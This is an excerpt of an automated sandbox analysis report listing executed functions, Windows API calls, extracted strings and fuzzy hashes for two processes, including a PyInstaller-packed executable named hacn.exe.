Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009330E5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 6c824631001b5e143c63c59c27597bc84c00023b4860febf091ab12724e6f6d7
Instruction ID: 19f2d6e75c1d71c84475f73fd71324ce79621e2b8c8823a292e317c53e2778c2
Opcode Fuzzy Hash: 6c824631001b5e143c63c59c27597bc84c00023b4860febf091ab12724e6f6d7
Instruction Fuzzy Hash: C1D05E3154C63036DA1133B66C0AE6FB9099BA2332FA04714F539661E9DE204E4257D1

Function 009301FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0092F951,?), ref: 009301FF
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0092F951,?), ref: 0093020D

Strings

RTL, xrefs: 00930207

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 99e8f9082dc9548b23511d2d69c4506433120bd8127a4cc78dac1e836f1870b4
Instruction ID: fd480b39ec0c4e78a239496c78c5de39ca9e6fbc7348626094e99b53b8a40d4b
Opcode Fuzzy Hash: 99e8f9082dc9548b23511d2d69c4506433120bd8127a4cc78dac1e836f1870b4
Instruction Fuzzy Hash: F0C0803125575057DB3057737C0DB832E586B40717F450448F541DB1D0D7E6C8458760

Analysis Process: hacn.exePID: 2676, Parent PID: 5840COMMON

Executed Functions

Function 00007FF692996470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6929964B5

Part of subcall function 00007FF692995E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692995E1C

Part of subcall function 00007FF69298B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B022
Part of subcall function 00007FF69298B00C: GetLastError.KERNEL32(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B02C

Part of subcall function 00007FF69298AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69298AFA3,?,?,?,?,?,00007FF6929831CC), ref: 00007FF69298AFCD
Part of subcall function 00007FF69298AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69298AFA3,?,?,?,?,?,00007FF6929831CC), ref: 00007FF69298AFF2

_get_daylight.LIBCMT ref: 00007FF6929964A4

Part of subcall function 00007FF692995E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692995E7C

_get_daylight.LIBCMT ref: 00007FF69299671A
_get_daylight.LIBCMT ref: 00007FF69299672B
_get_daylight.LIBCMT ref: 00007FF69299673C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69299697C), ref: 00007FF692996763

Strings

Eastern Standard Time, xrefs: 00007FF692996809
Eastern Summer Time, xrefs: 00007FF692996821

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1458651798-239921721
Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction ID: 3c09102e5ecb2791ac2cba0f2a9b60d9611bcffbe54c9590ea7ab2e956fda0d4
Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction Fuzzy Hash: 64D19E2AE082528AFB34AF27D8901B96761EF44BECF444175EA4DC7687DEBCE461C740

Function 00007FF6929973BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6929970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692997131
Part of subcall function 00007FF6929970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6929971AF
Part of subcall function 00007FF6929970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692997200

CreateFileW.KERNELBASE ref: 00007FF6929974C2
CreateFileW.KERNEL32 ref: 00007FF692997512
GetLastError.KERNEL32 ref: 00007FF692997542
GetFileType.KERNELBASE ref: 00007FF692997557
GetLastError.KERNEL32 ref: 00007FF692997561
CloseHandle.KERNEL32 ref: 00007FF692997594
CloseHandle.KERNEL32 ref: 00007FF6929976F7
CreateFileW.KERNEL32 ref: 00007FF69299772C
GetLastError.KERNEL32 ref: 00007FF69299773B

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction ID: c8ce3fda67743c4d2654c893dbd824484336fe5fae65bcf5b3d798a62489f688
Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction Fuzzy Hash: 35C1D376B28A4189FB60CF66C4916AC3771FB49BACB050275DA1E9B3D6CF78D465C300

Function 00007FF692977960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF69297154F), ref: 00007FF6929779F7

Part of subcall function 00007FF692977B70: GetEnvironmentVariableW.KERNEL32(00007FF692973A1F), ref: 00007FF692977BAA
Part of subcall function 00007FF692977B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF692977BC7

Part of subcall function 00007FF692987EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692987F05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF692977AB1

Part of subcall function 00007FF692972B30: MessageBoxW.USER32 ref: 00007FF692972C05

Strings

LOADER: Failed to set the TMP environment variable., xrefs: 00007FF6929779DA
TMP, xrefs: 00007FF6929779C0
TMP, xrefs: 00007FF69297799A, 00007FF692977A59, 00007FF692977AE7
_MEI%d, xrefs: 00007FF692977A05

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 5ba17ae65ebc39be6e5ecc80ca7826a35a7ea09f79554ee3d64871af99c4e77d
Instruction ID: b0f2ce0f7f79e611321ee850fcf5cfa08affcbfe2a0ea473a40c33647a2f6d70
Opcode Fuzzy Hash: 5ba17ae65ebc39be6e5ecc80ca7826a35a7ea09f79554ee3d64871af99c4e77d
Instruction Fuzzy Hash: 9C519F11B0D21345FE74BB27A9212FA5395EF89BC8F4840B5ED0ECB7A7EDADE5018240

Function 00007FF692971AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6929782C0: _fread_nolock.LIBCMT ref: 00007FF69297836A

_fread_nolock.LIBCMT ref: 00007FF692971B54

Part of subcall function 00007FF692972890: MessageBoxW.USER32 ref: 00007FF69297299B

Strings

malloc, xrefs: 00007FF692971BDD
fread, xrefs: 00007FF692971B66, 00007FF692971C10
MEI, xrefs: 00007FF692971AE2
fseek, xrefs: 00007FF692971B33
Could not allocate buffer for TOC!, xrefs: 00007FF692971BD6
Failed to seek to cookie position!, xrefs: 00007FF692971B2C
Could not read full TOC!, xrefs: 00007FF692971C09
Failed to read cookie!, xrefs: 00007FF692971B5F
Error on file., xrefs: 00007FF692971C36

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: 47e4eafb180ea2df6a33b469e97ba65bab2619a214ea88dc4ada9b8af2080f8c
Instruction ID: ba599ee26c712fabd4cee11f2ca33767d842742b6faa3f0999cac89b4696b14c
Opcode Fuzzy Hash: 47e4eafb180ea2df6a33b469e97ba65bab2619a214ea88dc4ada9b8af2080f8c
Instruction Fuzzy Hash: 7B519071A196028AFB34DF2AE45017833A4EF88B9CB554175DA4DC779BDEBCE440C744

Function 00007FF692971000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF692973ED0: GetModuleFileNameW.KERNEL32(?,00007FF6929739EA), ref: 00007FF692973F01

SetDllDirectoryW.KERNEL32 ref: 00007FF692973BF5

Part of subcall function 00007FF692977B70: GetEnvironmentVariableW.KERNEL32(00007FF692973A1F), ref: 00007FF692977BAA
Part of subcall function 00007FF692977B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF692977BC7

Strings

MEI, xrefs: 00007FF692973AFA
_MEIPASS2, xrefs: 00007FF692973A0B, 00007FF692973A74, 00007FF692973D27, 00007FF692973D33
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF692973B3F
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF692973AC6
Failed to convert DLL search path!, xrefs: 00007FF692973BE5
_PYI_ONEDIR_MODE, xrefs: 00007FF692973A34, 00007FF692973A5F
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF692973B73

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-1544818733
Opcode ID: 7cc65c86756cc808ec1b0249ed19e691a9caed38d8dfd1ef2e97b3f8d7c16418
Instruction ID: ed8a82d09b621fc6ab0d4975a696e5216f1a96f2bc650baed48233d0aa6929c3
Opcode Fuzzy Hash: 7cc65c86756cc808ec1b0249ed19e691a9caed38d8dfd1ef2e97b3f8d7c16418
Instruction Fuzzy Hash: 83B17021A1D64341FA74EB2394512FD6398FF84B8CF4401B6EA4DC7697EFACE6058744

Function 00007FF69298F2D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF69298F66A,?,?,-00000018,00007FF69298B417,?,?,?,00007FF69298B30E,?,?,?,00007FF692986552), ref: 00007FF69298F44C
GetProcAddress.KERNEL32(?,?,?,00007FF69298F66A,?,?,-00000018,00007FF69298B417,?,?,?,00007FF69298B30E,?,?,?,00007FF692986552), ref: 00007FF69298F458

Strings

ext-ms-, xrefs: 00007FF69298F3A9
api-ms-, xrefs: 00007FF69298F396

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction ID: 3f56950757528560ee7283d574962439a046f486dd2c285445f67a6169cc7750
Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction Fuzzy Hash: 63410321B19B1241FA36DB17A8045BA2391FF4ABE8F8C5176DD0DD7786DEBCE4498310

Function 00007FF692978980 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF692978660: GetCurrentProcess.KERNEL32 ref: 00007FF692978680
Part of subcall function 00007FF692978660: OpenProcessToken.ADVAPI32 ref: 00007FF692978691
Part of subcall function 00007FF692978660: GetTokenInformation.KERNELBASE ref: 00007FF6929786B6
Part of subcall function 00007FF692978660: GetLastError.KERNEL32 ref: 00007FF6929786C0
Part of subcall function 00007FF692978660: GetTokenInformation.KERNELBASE ref: 00007FF692978700
Part of subcall function 00007FF692978660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69297871C
Part of subcall function 00007FF692978660: CloseHandle.KERNEL32 ref: 00007FF692978734

LocalFree.KERNEL32(00000000,00007FF692973B6E), ref: 00007FF692978A0C
LocalFree.KERNEL32 ref: 00007FF692978A15

Strings

D:(A;;FA;;;%s), xrefs: 00007FF6929789F7
Security descriptor string length exceeds PATH_MAX!, xrefs: 00007FF692978A23
S-1-3-4, xrefs: 00007FF6929789C1
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6929789E2

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
API String ID: 6828938-1817031585
Opcode ID: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
Instruction ID: 5ea705e96fa624f89448cf859bd577981de652c39a45df21665ab683b0844a49
Opcode Fuzzy Hash: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
Instruction Fuzzy Hash: 2C21C231A1878685F630EB22E8556F92369FF54798F4401B1E94EC3797DFBCE5048380

Function 00007FF69297C17C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF69297C18B

Part of subcall function 00007FF69297C34C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF69297C36E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF69297C1A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF69297C20E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF69297C261

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction ID: 274e7e4dfea8e17f1307ffeda4186f82c1b6161c2999d4cd76b417e2df38107a
Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction Fuzzy Hash: 5E313B21E0D54385FA34ABA794623B92399EF61B4CF4450B5EA0EDB2E7DEECF404C211

Function 00007FF692985800 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69298582D
CreateFileW.KERNELBASE ref: 00007FF69298586C
CloseHandle.KERNEL32 ref: 00007FF6929858A1

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction ID: 30d134f441cda43d3a4b6c40ef4d73ba588fd47dc3e50494ce1191927b56ff58
Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction Fuzzy Hash: F241A222D1878283F7609B22D5103B96370FF94768F159375EA9C8BAD2DFACA5E48700

Function 00007FF692978B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE ref: 00007FF692978BC0

Part of subcall function 00007FF692972C50: MessageBoxW.USER32 ref: 00007FF692972D25

Strings

Security descriptor is not initialized!, xrefs: 00007FF692978B90

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: CreateDirectoryMessage
String ID: Security descriptor is not initialized!
API String ID: 73271072-986317556
Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction ID: e5df6af879073b052122ec4c52350eca8f05c32be291a09b4c40bff1e3d9b067
Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction Fuzzy Hash: 53E092B1E187068AFA30AB16E8452692390FB55768F8013B4E15DC73E5EFBCD1198B40

Function 00007FF69298037C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6929803C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6929804B7

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
Instruction ID: 4f63ab4bc4ca3b28aea4fae7955c67aed2c6adf3426208a3b84dc97c4da598a8
Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
Instruction Fuzzy Hash: 9551C261B0A28286FA389B37940067A67D1FF84BACF1C4675DD6D877C7DEBCE4018610

Function 00007FF69298B21C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF69298B099,?,?,00000000,00007FF69298B14E), ref: 00007FF69298B28A
GetLastError.KERNEL32(?,?,?,00007FF69298B099,?,?,00000000,00007FF69298B14E), ref: 00007FF69298B294

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction ID: 27a3dac50121d40140d21d8ef8956da95d08e75757e3ef27da8ab1e4ee1c8ff3
Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction Fuzzy Hash: 2C21C320B1868601FAB097A3946527D1392EF947E8F4C42B9DA2FC77D7DEECE4458302

Function 00007FF69298C7F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF69298C98D), ref: 00007FF69298C840
GetLastError.KERNEL32(?,?,?,?,?,00007FF69298C98D), ref: 00007FF69298C84A

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

